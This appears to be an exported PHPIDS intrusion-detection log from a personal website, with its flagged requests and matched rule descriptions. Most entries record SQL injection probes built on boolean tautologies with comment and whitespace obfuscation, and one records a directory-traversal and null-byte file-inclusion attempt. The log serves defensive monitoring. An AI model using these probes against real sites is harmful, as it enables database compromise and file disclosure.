| ID: | 123342 | | Name: | COOKIE.BCSI-AC-4E050338BC5CF7E7 | | Value: | 1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA= | | Page: | / | | IP: | 170.167.4.200 | | Impact: | 22 | | Created: | 2010-05-03 07:12:44 | | Details: | Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.0769230769231 Converted: ((++:
|
| ID: | 123339 | | Name: | REQUEST.page | | Value: | videos/pn12/i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana | | Page: | /i.php?page=videos/pn12/i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana | | IP: | 184.73.73.48 | | Impact: | 10 | | Created: | 2010-05-03 04:27:07 | | Details: | Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
|
| ID: | 123340 | | Name: | GET.page | | Value: | videos/pn12/i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana | | Page: | /i.php?page=videos/pn12/i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana | | IP: | 184.73.73.48 | | Impact: | 10 | | Created: | 2010-05-03 04:27:07 | | Details: | Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
|
| ID: | 123337 | | Name: | REQUEST.page | | Value: | videos/pn12/i.php?page=hoosier | | Page: | /i.php?page=videos/pn12/i.php?page=hoosier | | IP: | 184.73.73.48 | | Impact: | 10 | | Created: | 2010-05-03 04:26:19 | | Details: | Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
|
| ID: | 123338 | | Name: | GET.page | | Value: | videos/pn12/i.php?page=hoosier | | Page: | /i.php?page=videos/pn12/i.php?page=hoosier | | IP: | 184.73.73.48 | | Impact: | 10 | | Created: | 2010-05-03 04:26:19 | | Details: | Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
|
| ID: | 123335 | | Name: | REQUEST.task | | Value: | ../../../../../../../../../../../../../../../proc/self/MILDNet | | Page: | /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/MILDNet%00 | | IP: | 89.108.70.47 | | Impact: | 30 | | Created: | 2010-05-03 03:56:58 | | Details: | Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10 Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123336 | | Name: | GET.task | | Value: | ../../../../../../../../../../../../../../../proc/self/MILDNet | | Page: | /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/MILDNet%00 | | IP: | 89.108.70.47 | | Impact: | 30 | | Created: | 2010-05-03 03:56:58 | | Details: | Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10 Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123333 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated'/**/XoR/**/'8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 02:40:41 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123334 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated'/**/XoR/**/'8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 02:40:41 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123331 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated'/**/XoR/**/'8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 02:40:38 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123332 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated'/**/XoR/**/'8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 02:40:38 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123329 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 38 | | Created: | 2010-05-03 02:40:37 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123330 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 38 | | Created: | 2010-05-03 02:40:37 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123325 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 38 | | Created: | 2010-05-03 02:40:36 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123326 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 38 | | Created: | 2010-05-03 02:40:36 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123327 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 38 | | Created: | 2010-05-03 02:40:36 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123328 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 38 | | Created: | 2010-05-03 02:40:36 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123323 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 38 | | Created: | 2010-05-03 02:40:35 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123324 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 38 | | Created: | 2010-05-03 02:40:35 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123321 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated/**/XoR/**/8=8 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D8 | | IP: | 60.4.51.66 | | Impact: | 6 | | Created: | 2010-05-03 02:40:34 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123322 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated/**/XoR/**/8=8 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D8 | | IP: | 60.4.51.66 | | Impact: | 6 | | Created: | 2010-05-03 02:40:34 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123319 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated/**/XoR/**/8=3 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D3 | | IP: | 60.4.51.66 | | Impact: | 6 | | Created: | 2010-05-03 02:40:33 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123320 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated/**/XoR/**/8=3 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D3 | | IP: | 60.4.51.66 | | Impact: | 6 | | Created: | 2010-05-03 02:40:33 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123315 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated%'/**/aND/**/'8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 02:40:25 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123316 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated%'/**/aND/**/'8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 02:40:25 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123317 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated%'/**/aND/**/'8%'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%25%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 02:40:25 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123318 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated%'/**/aND/**/'8%'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%25%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 02:40:25 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123313 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated%' aND '8%'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%25%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 02:40:24 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123314 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated%' aND '8%'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%25%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 02:40:24 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123311 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated%' aND '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 02:40:23 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123312 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated%' aND '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 02:40:23 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123309 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated%' aND '8%'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 02:40:21 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123310 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated%' aND '8%'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 02:40:21 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123307 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated%' aND '8%'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 02:40:17 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123308 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated%' aND '8%'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 02:40:17 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123303 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated'/**/aND/**/'8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 02:40:16 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123304 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated'/**/aND/**/'8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 02:40:16 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123305 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated'/**/aND/**/'8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 02:40:16 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123306 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated'/**/aND/**/'8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 02:40:16 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123301 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated/**/aND/**/8=3 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D3 | | IP: | 60.4.51.66 | | Impact: | 6 | | Created: | 2010-05-03 02:40:14 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123302 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated/**/aND/**/8=3 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D3 | | IP: | 60.4.51.66 | | Impact: | 6 | | Created: | 2010-05-03 02:40:14 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123299 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated/**/aND/**/8=8 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D8 | | IP: | 60.4.51.66 | | Impact: | 6 | | Created: | 2010-05-03 02:40:08 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123300 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated/**/aND/**/8=8 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D8 | | IP: | 60.4.51.66 | | Impact: | 6 | | Created: | 2010-05-03 02:40:08 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123297 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' aND '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 02:40:06 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123298 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' aND '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 02:40:06 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123295 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' aND '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 02:40:05 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123296 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' aND '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 02:40:05 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123293 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' aND '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 02:40:00 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123294 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' aND '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 02:40:00 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123291 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' aND '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 02:39:59 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
